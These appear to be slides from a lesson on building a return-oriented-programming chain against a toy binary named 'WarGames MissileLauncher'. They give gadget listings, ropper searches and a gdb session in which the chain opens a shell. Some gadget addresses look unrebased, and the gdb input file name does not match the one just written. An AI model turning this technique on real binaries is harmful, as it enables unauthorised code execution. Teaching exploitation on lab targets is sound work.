2. 0x000a2c66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret;
3. 0x0001730c: mov dword ptr [edx], eax; ret;
4. 0x08055df4: xor eax, eax; ret;
5. 0x0000101e: pop ebx; ret;
8. 0x000df9d3: neg eax; ret;
9. 0x00113f80: int 0x80; ret;
Missing: xor ecx, ecx; ret;
Missing: xor edx, edx; ret;
# 11. Zero out ecx
# TODO

# 12. Zero out edx
# TODO
53
execve gadgets (from gen ROP chain)
1. 0x000ae1aa: pop eax; ret;
2. 0x000a2c66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret;
3. 0x0001730c: mov dword ptr [edx], eax; ret;
4. 0x08055df4: xor eax, eax; ret;
5. 0x0000101e: pop ebx; ret;
6. 0x00004c88: pop ecx; ret;
7. 0x000f9715: pop edx; xor eax, eax; pop edi; ret;
8. 0x000df9d3: neg eax; ret;
9. 0x00113f80: int 0x80; ret;
54
Missing 3 gadgets
xor ebx, ebx; ret;
xor ecx, ecx; ret;
xor edx, edx; ret;
55
Terminal
$ ropper --file target --search "xor ebx, ebx"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: xor ebx, ebx
[INFO] File: target
0x0811e009: xor ebx, ebx; jmp edx;
0x080ee378: xor ebx, ebx; mov eax, ebx; pop ebx; pop esi; pop edi; ret;
0x0815b675: xor ebx, ebx; mov eax, ecx; int 0x80;
0x080f8a7e: xor ebx, ebx; mov eax, edx; int 0x80;
0x0816abcb: xor ebx, ebx; mov esi, 8; mov dword ptr [esp + 0xc], edx; mov eax, 0xaf; lea ecx, [ecx - 0x5c874]; call dword ptr gs:[0x10];
0x080b4fce: xor ebx, ebx; movsx eax, al; pop ecx; push eax; push esi; call dword ptr [edx + 8];
0x08168060: xor ebx, ebx; movzx eax, byte ptr [edi + eax - 0x20]; mov edi, dword ptr [esp + 0xc]; mov eax, dword ptr [edi + eax*4 - 0x4554]; jmp eax;
0x081680ac: xor ebx, ebx; movzx eax, byte ptr [edx + eax - 0x20]; mov eax, dword ptr [edi + eax*4 - 0x4554]; jmp eax;
0x0807466c: xor ebx, ebx; push eax; push edi; call dword ptr [edx + 8];
0x080d5b4d: xor ebx, ebx; push ecx; call dword ptr [eax + 0x18];
0x0808a868: xor ebx, ebx; push edx; push edi; call dword ptr [eax + 0x18];
0x0804cc9a: xor ebx, ebx; ret;
56
All 3 are present in the binary
0x0804cc9a: xor ebx, ebx; ret;
0x0804ccad: xor ecx, ecx; ret;
0x0804ccc0: xor edx, edx; ret;
57
The Plan
Write C code for shellcode
Test C code
Write inline assembly
Test asm code
Create ROP Chain
Test ROP Chain
58
Terminal
Test ROP Chain
$ ./rop_chain.py > rop_chain_file
$ gdb -q target
Reading symbols from target...
(gdb) r < rop_chain_file
Starting program: target < advanced_ropper_file
WarGames MissileLauncher v0.1
Secret: Access granted
Launching -1869574000 missiles
Access denied
process 3279834 is executing new program: /usr/bin/dash
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
$